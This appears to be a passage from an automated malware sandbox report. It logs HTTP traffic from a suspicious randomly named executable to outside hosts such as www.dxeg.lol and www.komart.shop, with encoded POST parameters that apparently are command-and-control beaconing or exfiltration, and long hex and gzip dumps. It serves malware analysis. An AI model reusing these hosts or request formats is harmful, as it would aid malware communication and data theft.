                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.11.2049809133.130.35.90803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:10.427831888 CEST545OUTGET /qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:10.706590891 CEST883INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:10 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 693
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.11.2049810137.175.33.56803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:16.291539907 CEST798OUTPOST /ytua/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Origin: http://www.dxeg.lol
                                                                                  Referer: http://www.dxeg.lol/ytua/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2b 68 32 6e 42 6f 59 37 57 76 52 6d 56 67 50 6d 44 53 61 44 49 34 72 32 35 71 59 33 75 6d 42 43 35 70 35 6c 6f 32 47 62 30 54 42 71 68 44 71 49 7a 57 64 6b 69 6e 62 71 75 42 7a 66 4f 56 53 68 6c 2b 58 54 35 79 47 48 63 63 73 4f 32 44 4e 46 54 59 44 4a 6f 32 79 52 66 51 53 59 32 56 74 74 33 78 30 73 37 68 79 37 70 36 30 38 2f 38 6f 46 79 56 4d 48 59 68 68 43 55 2f 4a 54 2b 4c 76 55 33 4e 2b 32 5a 5a 6c 4f 63 68 4f 55 74 35 67 65 62 73 58 42 56 66 66 74 69 30 6f 47 6a 55 58 6b 2f 4e 55 63 4f 75 4e 39 42 78 57 42 7a 46 77 41 57 6c 37 48 4e 77 3d 3d
                                                                                  Data Ascii: Xb3xI=TGAqx/BgoJtw+h2nBoY7WvRmVgPmDSaDI4r25qY3umBC5p5lo2Gb0TBqhDqIzWdkinbquBzfOVShl+XT5yGHccsO2DNFTYDJo2yRfQSY2Vtt3x0s7hy7p608/8oFyVMHYhhCU/JT+LvU3N+2ZZlOchOUt5gebsXBVffti0oGjUXk/NUcOuN9BxWBzFwAWl7HNw==
                                                                                  Sep 25, 2024 09:58:16.462749004 CEST1289INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:16 GMT
                                                                                  Content-Type: text/html
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66f2e6b3-49f9"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 31 30 39 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 5b 53 e3 46 16 7e cf bf d8 ad a2 6a f3 20 ac 6b 4b aa dd da 2a e2 61 32 64 19 c8 02 33 d9 ec 8b 4b 97 16 16 d8 96 47 96 31 f0 90 df be df 77 5a be 80 8d c7 99 4c 58 2a 21 35 11 b2 d4 7d fa a2 ef 5c fa 9c d3 fd 8f 49 56 97 e3 e6 9f df fc e3 2f 96 f5 4d 5e 65 d3 a1 1e 35 fb b3 ba 6c f4 df a6 23 3d c9 92 b1 fe db 5f f7 a6 85 2e 8a 3d af bb e7 3a 6f 4e bb 17 3f ff 78 b8 e7 da fd 66 38 d8 f3 0e f1 58 ee 5c 7b 90 8c 2e f7 bc 37 7b ae 7b df b7 ba 27 f8 db be d6 49 6e ee 9a b2 19 68 de 4e 83 d8 0d f7 a6 51 a6 1c 5c e3 4c ed 4d e3 28 76 7a f9 ad eb ee df de dd a3 80 ca 35 ae 69 8a 57 41 5a 64 28 e6 ba 09 1a eb 2c 88 78 dd a1 6e 12 34 3c 4a 86 a0 ca 86 af f5 dd ac aa f3 09 db 76 ed ac 1a 35 18 8f 79 b5 37 0d 43 9d af b6 b6 e7 76 f7 a6 ca 77 d0 4e 98 3a 0f 3a 22 af 96 fd 42 17 5c 1b 1d f1 75 92 ca ab c0 f1 49 2a f7 e2 35 82 41 e8 46 20 a8 d3 62 ed 55 1c 45 3e ea fa 7e 82 02 ae 1f 2e 66 68 6d 1c 39 a6 9e 5f a6 ac 46 1b 87 a2 bc dc 46 77 8a 38 c5 08 42 1b f7 [TRUNCATED]
                                                                                  Data Ascii: 1094\[SF~j kK*a2d3KG1wZLX*!5}\IV/M^e5l#=_.=:oN?xf8X\{.7{{'InhNQ\LM(vz5iWAZd(,xn4<Jv5y7CvwN::"B\uI*5AF bUE>~.fhm9_FFw8B*Hyx* P>dyO7vn,ekow|OxkEB|azZtz]6{aVVn$|^)0# /wOuaXnth@UzMgn6thVM$&\{:$sVd|t1)k_rTYkTuk84VoA'93PE&uf :S$YRv&ltIUs$sE5kZgIrP`fXdbIs7 e@RjNq9hSuL_N*#)/<ZuaZ!d~96e};WKq}BU~gI$Y{m+2.Ka^Q'fRW:{BkB8_NK\[TeT&RCSb:C;%[PP\|yD9~CfErWA{wiKNDW=e-^Coemiq/MFMCv=8x9C]G [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:16.462855101 CEST1289INData Raw: ba e9 1e 66 ed 2b a2 72 4e 14 0c bf 79 6c 5b f0 b5 22 db ec b4 e9 0d b3 45 bf d6 46 37 ec 2d 5f 52 c4 ad a8 d6 7e 67 ae 21 92 fa 52 cc 38 90 e9 a5 30 ed a1 83 5b 41 a6 0a d8 be 30 85 61 c0 87 59 0a eb 39 b6 6d c0 6e 21 c8 96 9d 7c 8a f8 8a a4 1c
                                                                                  Data Ascii: f+rNyl["EF7-_R~g!R80[A0aY9mn!|!:]UUA9vd}G,z-eY+Ukpi&>-iw{ob['jfO.,GIkA-0whMU{4WF_0g
                                                                                  Sep 25, 2024 09:58:16.462996006 CEST1289INData Raw: 0a 0a f5 f1 25 88 a8 f5 88 c5 f3 46 cb 5e 8c d3 7a ab b7 fa cb 39 e8 cb 43 03 5f 35 d4 f0 e7 8d 33 98 44 4c 93 84 13 c7 31 ad dc 94 ae 84 28 57 b4 a0 61 89 38 f0 32 c0 1d 26 31 6d c9 e3 0c 3d e6 6e 06 4e 84 85 1c 0b c0 9b bb 93 d7 eb 35 e4 60 f2
                                                                                  Data Ascii: %F^z9C_53DL1(Wa82&1m=nN5`#p9WeRNCGK\T'*f27c*iIj"#T%6.bF8+suqTWB0'b[jef#@\JWsS2sEGES#:3xH-iHX5Xr
                                                                                  Sep 25, 2024 09:58:16.463010073 CEST651INData Raw: 1f cf 4e 7f 38 ec 0a 39 fb e2 14 17 0e e4 c7 c3 b3 f3 53 14 b7 3f 9c bc 91 61 5e bc 63 67 0e be e7 f5 14 3b 40 6c 7c 3c d7 fe f9 f0 e0 ec 7c 7f fb ac cd 39 05 00 37 0b 58 9a 26 8a 0b 55 20 80 48 68 45 bc 26 67 25 19 39 42 f2 06 81 1c 22 53 cc 70
                                                                                  Data Ascii: N89S?a^cg;@l|<|97X&U HhE&g%9B"Sp"/Ep_8l3|2XAA_-CWCSTH0Ki6Jm:9:lAm%T#Zc;;_Go.nZP7.jVM8S


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.11.2049811137.175.33.56803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:18.996514082 CEST818OUTPOST /ytua/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Origin: http://www.dxeg.lol
                                                                                  Referer: http://www.dxeg.lol/ytua/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2f 42 6d 6e 48 4a 59 37 44 2f 52 6c 62 41 50 6d 4e 43 61 48 49 34 6e 32 35 72 63 6e 74 55 56 43 36 49 70 6c 72 30 69 62 7a 54 42 71 35 7a 71 4e 39 32 64 7a 69 6e 65 66 75 45 4c 66 4f 55 79 68 6c 38 66 54 34 46 61 47 61 4d 73 4d 39 6a 4e 48 4f 49 44 4a 6f 32 79 52 66 54 75 2b 32 55 4a 74 32 42 45 73 70 41 79 34 6e 61 31 4f 76 73 6f 46 6c 46 4d 44 59 68 68 77 55 37 4a 31 2b 4f 72 55 33 4a 32 32 61 49 6c 4e 57 68 50 66 6a 5a 68 47 54 74 36 46 4f 2b 4c 6c 72 6e 4e 59 68 52 48 5a 36 62 46 47 54 63 35 5a 43 69 4b 7a 33 31 4a 6f 55 6e 36 63 51 30 61 44 2f 30 43 45 4d 36 62 4d 4c 38 4b 2f 4d 79 69 7a 53 37 6f 3d
                                                                                  Data Ascii: Xb3xI=TGAqx/BgoJtw/BmnHJY7D/RlbAPmNCaHI4n25rcntUVC6Iplr0ibzTBq5zqN92dzinefuELfOUyhl8fT4FaGaMsM9jNHOIDJo2yRfTu+2UJt2BEspAy4na1OvsoFlFMDYhhwU7J1+OrU3J22aIlNWhPfjZhGTt6FO+LlrnNYhRHZ6bFGTc5ZCiKz31JoUn6cQ0aD/0CEM6bML8K/MyizS7o=
                                                                                  Sep 25, 2024 09:58:19.167783976 CEST1289INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66f2e6b3-49f9"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 31 30 39 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 5b 53 e3 46 16 7e cf bf d8 ad a2 6a f3 20 ac 6b 4b aa dd da 2a e2 61 32 64 19 c8 02 33 d9 ec 8b 4b 97 16 16 d8 96 47 96 31 f0 90 df be df 77 5a be 80 8d c7 99 4c 58 2a 21 35 11 b2 d4 7d fa a2 ef 5c fa 9c d3 fd 8f 49 56 97 e3 e6 9f df fc e3 2f 96 f5 4d 5e 65 d3 a1 1e 35 fb b3 ba 6c f4 df a6 23 3d c9 92 b1 fe db 5f f7 a6 85 2e 8a 3d af bb e7 3a 6f 4e bb 17 3f ff 78 b8 e7 da fd 66 38 d8 f3 0e f1 58 ee 5c 7b 90 8c 2e f7 bc 37 7b ae 7b df b7 ba 27 f8 db be d6 49 6e ee 9a b2 19 68 de 4e 83 d8 0d f7 a6 51 a6 1c 5c e3 4c ed 4d e3 28 76 7a f9 ad eb ee df de dd a3 80 ca 35 ae 69 8a 57 41 5a 64 28 e6 ba 09 1a eb 2c 88 78 dd a1 6e 12 34 3c 4a 86 a0 ca 86 af f5 dd ac aa f3 09 db 76 ed ac 1a 35 18 8f 79 b5 37 0d 43 9d af b6 b6 e7 76 f7 a6 ca 77 d0 4e 98 3a 0f 3a 22 af 96 fd 42 17 5c 1b 1d f1 75 92 ca ab c0 f1 49 2a f7 e2 35 82 41 e8 46 20 a8 d3 62 ed 55 1c 45 3e ea fa 7e 82 02 ae 1f 2e 66 68 6d 1c 39 a6 9e 5f a6 ac 46 1b 87 a2 bc dc 46 77 8a 38 c5 08 42 1b f7 [TRUNCATED]
                                                                                  Data Ascii: 1094\[SF~j kK*a2d3KG1wZLX*!5}\IV/M^e5l#=_.=:oN?xf8X\{.7{{'InhNQ\LM(vz5iWAZd(,xn4<Jv5y7CvwN::"B\uI*5AF bUE>~.fhm9_FFw8B*Hyx* P>dyO7vn,ekow|OxkEB|azZtz]6{aVVn$|^)0# /wOuaXnth@UzMgn6thVM$&\{:$sVd|t1)k_rTYkTuk84VoA'93PE&uf :S$YRv&ltIUs$sE5kZgIrP`fXdbIs7 e@RjNq9hSuL_N*#)/<ZuaZ!d~96e};WKq}BU~gI$Y{m+2.Ka^Q'fRW:{BkB8_NK\[TeT&RCSb:C;%[PP\|yD9~CfErWA{wiKNDW=e-^Coemiq/MFMCv=8x9C]G [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:19.167893887 CEST1289INData Raw: ba e9 1e 66 ed 2b a2 72 4e 14 0c bf 79 6c 5b f0 b5 22 db ec b4 e9 0d b3 45 bf d6 46 37 ec 2d 5f 52 c4 ad a8 d6 7e 67 ae 21 92 fa 52 cc 38 90 e9 a5 30 ed a1 83 5b 41 a6 0a d8 be 30 85 61 c0 87 59 0a eb 39 b6 6d c0 6e 21 c8 96 9d 7c 8a f8 8a a4 1c
                                                                                  Data Ascii: f+rNyl["EF7-_R~g!R80[A0aY9mn!|!:]UUA9vd}G,z-eY+Ukpi&>-iw{ob['jfO.,GIkA-0whMU{4WF_0g
                                                                                  Sep 25, 2024 09:58:19.168009043 CEST1289INData Raw: 0a 0a f5 f1 25 88 a8 f5 88 c5 f3 46 cb 5e 8c d3 7a ab b7 fa cb 39 e8 cb 43 03 5f 35 d4 f0 e7 8d 33 98 44 4c 93 84 13 c7 31 ad dc 94 ae 84 28 57 b4 a0 61 89 38 f0 32 c0 1d 26 31 6d c9 e3 0c 3d e6 6e 06 4e 84 85 1c 0b c0 9b bb 93 d7 eb 35 e4 60 f2
                                                                                  Data Ascii: %F^z9C_53DL1(Wa82&1m=nN5`#p9WeRNCGK\T'*f27c*iIj"#T%6.bF8+suqTWB0'b[jef#@\JWsS2sEGES#:3xH-iHX5Xr
                                                                                  Sep 25, 2024 09:58:19.168050051 CEST651INData Raw: 1f cf 4e 7f 38 ec 0a 39 fb e2 14 17 0e e4 c7 c3 b3 f3 53 14 b7 3f 9c bc 91 61 5e bc 63 67 0e be e7 f5 14 3b 40 6c 7c 3c d7 fe f9 f0 e0 ec 7c 7f fb ac cd 39 05 00 37 0b 58 9a 26 8a 0b 55 20 80 48 68 45 bc 26 67 25 19 39 42 f2 06 81 1c 22 53 cc 70
                                                                                  Data Ascii: N89S?a^cg;@l|<|97X&U HhE&g%9B"Sp"/Ep_8l3|2XAA_-CWCSTH0Ki6Jm:9:lAm%T#Zc;;_Go.nZP7.jVM8S


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.11.2049812137.175.33.56803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:21.694941998 CEST2578OUTPOST /ytua/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Origin: http://www.dxeg.lol
                                                                                  Referer: http://www.dxeg.lol/ytua/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2f 42 6d 6e 48 4a 59 37 44 2f 52 6c 62 41 50 6d 4e 43 61 48 49 34 6e 32 35 72 63 6e 74 55 4e 43 35 2f 70 6c 72 56 69 62 79 54 42 71 30 54 71 4d 39 32 64 79 69 6e 6d 54 75 45 50 68 4f 52 32 68 6c 5a 54 54 70 41 75 47 54 4d 73 4d 79 44 4e 47 54 59 44 63 6f 32 69 56 66 54 2b 2b 32 55 4a 74 32 44 63 73 2f 68 79 34 6c 61 30 38 2f 38 6f 43 79 56 4d 37 59 68 34 46 55 37 4e 44 2f 36 66 55 33 70 6d 32 4b 71 39 4e 61 68 50 64 7a 4a 68 56 54 74 32 4b 4f 2f 6e 66 72 69 77 31 68 57 62 5a 36 65 67 6a 4c 66 31 36 64 54 61 57 2b 55 35 4e 54 46 4c 50 59 44 71 72 7a 6c 71 76 50 4f 58 6b 56 74 75 71 59 67 53 41 50 4d 52 47 41 41 63 6d 39 61 56 63 51 73 59 63 32 67 34 57 64 7a 59 65 48 50 4b 56 46 74 34 34 62 4f 41 30 75 2b 39 46 42 35 34 63 54 64 4a 39 6a 6d 5a 4e 48 33 61 62 69 31 42 30 70 48 76 49 63 35 32 5a 71 70 6e 6c 4a 57 4b 2b 49 75 77 35 2b 33 49 62 47 68 64 44 55 70 41 49 37 7a 72 41 70 78 43 4c 6e 72 49 52 63 32 4d 45 71 4f 46 38 6e 47 44 50 31 78 56 35 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=TGAqx/BgoJtw/BmnHJY7D/RlbAPmNCaHI4n25rcntUNC5/plrVibyTBq0TqM92dyinmTuEPhOR2hlZTTpAuGTMsMyDNGTYDco2iVfT++2UJt2Dcs/hy4la08/8oCyVM7Yh4FU7ND/6fU3pm2Kq9NahPdzJhVTt2KO/nfriw1hWbZ6egjLf16dTaW+U5NTFLPYDqrzlqvPOXkVtuqYgSAPMRGAAcm9aVcQsYc2g4WdzYeHPKVFt44bOA0u+9FB54cTdJ9jmZNH3abi1B0pHvIc52ZqpnlJWK+Iuw5+3IbGhdDUpAI7zrApxCLnrIRc2MEqOF8nGDP1xV5xka9w39kBVoi4BQID9xVjbZlNJ7HVwXGI+vfFIkBSExBcxhykc6Hkzce8pDIW0alBFJLD5Hhe9mDy8/iwMmfwpseqhByHJ0sIewrwvu1/XPJLSZD6MUlOW8i9/I572YhZVj0jO2NNSAlRpMds198kjLftwmgAKEsPkhCiQz2OOHMMOWZG3BHZeR/84UJdCiGD6wAzd8CxedAuz+BMDupHvNah8lxwESDwijWqCMUKG+pKNlHPtsgCafOgde0IBZBtcOz9VJ0WnHmM307AwPBW/vGEYm6+Tyq7X9vDOD7WZNVWIFMDDH9wfUdRG9oTjWSFWDVnk5m6V/w2HeQkYAFgDWYcGHKPsfUfMB7M3d4FK2qBsDX5cPxBChUAz6HfTjL5aI9CrJdii9XaB9owhImxrI7Nhjz8HjOEbqbRkA4LZJKlXEfFBcnZB6cqDkCLBjxcKGMHy4HqqzTKO1kNQhZ+o7jELIL+AtN8Umhr/foeAymvxJflHFx/tH7r5JxLUiCSPlyo8TKEjEY/NJas3l+QaJL3EFL4WtBY20o4eS7CG0IAE0Yv28kgGM9vagflsvwhVPxM95cTfddZBoJb7MH6aVMInxHDZygmal8zr/KxM0AAg9ycaLtKHhA7ZMonJbMMh2gj0FwQEkcKYGsTMZrahApfwtYqH18lJ [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:21.695010900 CEST5156OUTData Raw: 72 6c 53 75 30 59 50 46 79 54 51 30 6d 77 4b 6b 55 44 4d 36 31 66 57 56 46 61 6a 5a 50 58 6f 6b 43 6e 4e 76 65 79 7a 44 50 36 47 64 44 42 66 4a 68 57 70 6b 4e 4b 76 49 78 34 67 6d 45 34 6e 39 35 4a 42 44 2b 33 75 6c 34 54 71 74 39 78 68 73 47 74
                                                                                  Data Ascii: rlSu0YPFyTQ0mwKkUDM61fWVFajZPXokCnNveyzDP6GdDBfJhWpkNKvIx4gmE4n95JBD+3ul4Tqt9xhsGtBvFSeWc2K/hGVNEeTHcJUiuulmLpGzRjK7zezg/57TxD+akgirwrCy96GmMcho77/suYzkz08TOsOhr0yLOQzs+YxyYKKEsnsTJqzF28KCS3F/E5qxDTquJoS6VSAJBgGvOLQqF5Ew6RS1QJNURM/DUmGqkqo41xW
                                                                                  Sep 25, 2024 09:58:21.695055008 CEST233OUTData Raw: 46 4a 45 55 67 6b 77 37 47 68 4f 5a 63 52 64 31 5a 2f 4b 56 59 55 70 72 62 72 70 32 36 4a 76 4a 37 37 4c 67 78 33 66 46 56 34 4a 56 6c 7a 56 69 4c 67 57 35 43 46 66 69 78 31 43 66 73 6b 71 50 4f 61 36 54 63 38 55 34 57 63 5a 2f 2b 69 63 32 37 62
                                                                                  Data Ascii: FJEUgkw7GhOZcRd1Z/KVYUprbrp26JvJ77Lgx3fFV4JVlzViLgW5CFfix1CfskqPOa6Tc8U4WcZ/+ic27bbfuas91KWSlnd3XCN7Qusnz6cU0KKW2zueuG/nzv8kFvMxFtWDlOKOHzMVaxXKfqR1q8qaACDqwShjmumfmtcE/CLlosj9G8hyrkLvnEhXH17OQ+ehnpSKUvRCxKOVpU44PWoXsXFRCN1jhCdq9Sg==
                                                                                  Sep 25, 2024 09:58:21.862380981 CEST1289INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66f2e6b3-49f9"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 31 30 39 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 5b 53 e3 46 16 7e cf bf d8 ad a2 6a f3 20 ac 6b 4b aa dd da 2a e2 61 32 64 19 c8 02 33 d9 ec 8b 4b 97 16 16 d8 96 47 96 31 f0 90 df be df 77 5a be 80 8d c7 99 4c 58 2a 21 35 11 b2 d4 7d fa a2 ef 5c fa 9c d3 fd 8f 49 56 97 e3 e6 9f df fc e3 2f 96 f5 4d 5e 65 d3 a1 1e 35 fb b3 ba 6c f4 df a6 23 3d c9 92 b1 fe db 5f f7 a6 85 2e 8a 3d af bb e7 3a 6f 4e bb 17 3f ff 78 b8 e7 da fd 66 38 d8 f3 0e f1 58 ee 5c 7b 90 8c 2e f7 bc 37 7b ae 7b df b7 ba 27 f8 db be d6 49 6e ee 9a b2 19 68 de 4e 83 d8 0d f7 a6 51 a6 1c 5c e3 4c ed 4d e3 28 76 7a f9 ad eb ee df de dd a3 80 ca 35 ae 69 8a 57 41 5a 64 28 e6 ba 09 1a eb 2c 88 78 dd a1 6e 12 34 3c 4a 86 a0 ca 86 af f5 dd ac aa f3 09 db 76 ed ac 1a 35 18 8f 79 b5 37 0d 43 9d af b6 b6 e7 76 f7 a6 ca 77 d0 4e 98 3a 0f 3a 22 af 96 fd 42 17 5c 1b 1d f1 75 92 ca ab c0 f1 49 2a f7 e2 35 82 41 e8 46 20 a8 d3 62 ed 55 1c 45 3e ea fa 7e 82 02 ae 1f 2e 66 68 6d 1c 39 a6 9e 5f a6 ac 46 1b 87 a2 bc dc 46 77 8a 38 c5 08 42 1b f7 [TRUNCATED]
                                                                                  Data Ascii: 1094\[SF~j kK*a2d3KG1wZLX*!5}\IV/M^e5l#=_.=:oN?xf8X\{.7{{'InhNQ\LM(vz5iWAZd(,xn4<Jv5y7CvwN::"B\uI*5AF bUE>~.fhm9_FFw8B*Hyx* P>dyO7vn,ekow|OxkEB|azZtz]6{aVVn$|^)0# /wOuaXnth@UzMgn6thVM$&\{:$sVd|t1)k_rTYkTuk84VoA'93PE&uf :S$YRv&ltIUs$sE5kZgIrP`fXdbIs7 e@RjNq9hSuL_N*#)/<ZuaZ!d~96e};WKq}BU~gI$Y{m+2.Ka^Q'fRW:{BkB8_NK\[TeT&RCSb:C;%[PP\|yD9~CfErWA{wiKNDW=e-^Coemiq/MFMCv=8x9C]G [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:21.862665892 CEST1289INData Raw: ba e9 1e 66 ed 2b a2 72 4e 14 0c bf 79 6c 5b f0 b5 22 db ec b4 e9 0d b3 45 bf d6 46 37 ec 2d 5f 52 c4 ad a8 d6 7e 67 ae 21 92 fa 52 cc 38 90 e9 a5 30 ed a1 83 5b 41 a6 0a d8 be 30 85 61 c0 87 59 0a eb 39 b6 6d c0 6e 21 c8 96 9d 7c 8a f8 8a a4 1c
                                                                                  Data Ascii: f+rNyl["EF7-_R~g!R80[A0aY9mn!|!:]UUA9vd}G,z-eY+Ukpi&>-iw{ob['jfO.,GIkA-0whMU{4WF_0g
                                                                                  Sep 25, 2024 09:58:21.862694979 CEST1289INData Raw: 0a 0a f5 f1 25 88 a8 f5 88 c5 f3 46 cb 5e 8c d3 7a ab b7 fa cb 39 e8 cb 43 03 5f 35 d4 f0 e7 8d 33 98 44 4c 93 84 13 c7 31 ad dc 94 ae 84 28 57 b4 a0 61 89 38 f0 32 c0 1d 26 31 6d c9 e3 0c 3d e6 6e 06 4e 84 85 1c 0b c0 9b bb 93 d7 eb 35 e4 60 f2
                                                                                  Data Ascii: %F^z9C_53DL1(Wa82&1m=nN5`#p9WeRNCGK\T'*f27c*iIj"#T%6.bF8+suqTWB0'b[jef#@\JWsS2sEGES#:3xH-iHX5Xr
